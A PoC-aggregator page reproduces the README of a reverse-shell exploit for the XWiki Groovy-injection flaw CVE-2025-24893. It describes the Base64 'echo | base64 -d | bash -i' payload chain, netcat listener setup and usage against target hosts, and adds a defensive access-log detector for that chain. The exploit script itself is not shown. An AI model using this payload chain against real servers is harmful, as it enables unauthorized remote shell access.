Related vulnerability
Description
CVE-2025-24893 RCE exploit for XWiki with reverse shell capability
Introduction
# CVE-2025-24893 Reverse Shell Exploit for XWiki
**Disclaimer:** This script is intended for **educational purposes and authorized security testing only**. Do **not** use on systems you do not own or have explicit permission to test. Misuse can be illegal and dangerous.
## Description
This Python script exploits **CVE-2025-24893**, a Remote Code Execution vulnerability affecting XWiki versions up to **15.10.10**.
- **Tested Version:** XWiki 15.10.8
- **Impact:** Allows execution of arbitrary commands on the target server.
- **Python Version:** Written and tested in **Python 3**
This version **extends the original PoC** by Al Baradi Joy to spawn a **reverse shell**. The original PoC can be found [here](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py).
## How It Works
- XWiki evaluates Groovy code supplied through a URL parameter.
- The exploit injects a **`bash -c` command** into this Groovy template.
- A normal reverse shell contains multiple quotes (`'` and `"`) that would **break Groovy evaluation** and the URL.
- To solve this, the script **encodes the one-line shell command in Base64**.
- The payload is then sent in the URL and executed using the following chain:
`{echo,<base64>} | {base64,-d} | {bash,-i}`
- This decodes the Base64 payload safely and executes it with `bash -i`, giving an interactive reverse shell.
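Because the command chain above is fixed, a defender can look for it in web server access logs regardless of which XWiki page or parameter carried it. The following detector is an added example written for this README, not part of the exploit script: it URL-decodes each request path, matches the `{echo,<base64>} | {base64,-d} | {bash,-i}` chain, and decodes the Base64 blob so an analyst sees the command that was attempted. The log lines and the request path in them are constructed for the example; the path is a placeholder, not the real endpoint.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The request path in
# the second line is a placeholder; the Base64 blob decodes to "echo hello".
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /xwiki/constructed-path?input=%7Becho%2CZWNobyBoZWxsbw%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1" 200 9
"""

# Request line of a combined/common log format entry: method, URI, protocol.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# The brace-expansion chain the README describes; whitespace between the
# pipe stages is optional because the URL may carry it encoded or omit it.
CHAIN_RE = re.compile(
    r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}\s*\|\s*\{bash,-i\}"
)


def extract_chain(uri):
    """Return a finding dict if the URI carries the chain, else None."""
    decoded = unquote(uri)  # undo %7B, %7C, %2C, %3D ... encoding
    m = CHAIN_RE.search(decoded)
    if not m:
        return None
    blob = m.group(1)
    try:
        command = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        command = None  # malformed blob: still a hit, just not decodable
    return {"uri": uri, "base64": blob, "decoded_command": command}


def scan_log(text):
    """Scan access-log text line by line and collect every chain hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            hit = extract_chain(m.group(1))
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"hit: {h['uri']}\n  decoded command: {h['decoded_command']!r}")
```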
## Target URL Format
- **Format:** `http://<target-host>`
- **Do NOT include:**
  - A trailing slash `/` at the end
  - The `/xwiki` path (the script appends it automatically)
**Examples:**

```text
# Correct
http://10.129.95.114:8080
http://example.com:8080

# Incorrect
http://10.129.95.114:8080/   # trailing slash
http://example.com/xwiki     # includes /xwiki
```
## Listener Setup
Before running the exploit, you **must start a listener** on your machine to catch the reverse shell.
**Example using Netcat:**

```bash
nc -lvnp <lport>
```
- `<lport>` should match the port you provide as an argument to the script.
## Usage
```bash
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
```
**Example:**
```bash
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
```
- The script prints the full exploit URL, Base64 payload, and instructions for checking your listener.
## References
- [GHSA Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j)
- [XWiki Homepage](https://www.xwiki.org/)
- Original PoC by [Al Baradi Joy](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py)
## Credits
- Original Proof-of-Concept: Al Baradi Joy
- This version: Upgraded to spawn a reverse shell for interactive command execution
## Warning
- Use this exploit **only in controlled environments** (HTB, lab machines, VMs you own).
- Unauthorized use on public servers is illegal and can result in criminal charges.
File snapshot
[4.0K] /data/pocs/39c283efc3daca27997906912a8317b788fe4e70
├── [2.7K] README.md
└── [3.3K] xwiki_exploit.py
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been taken down or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.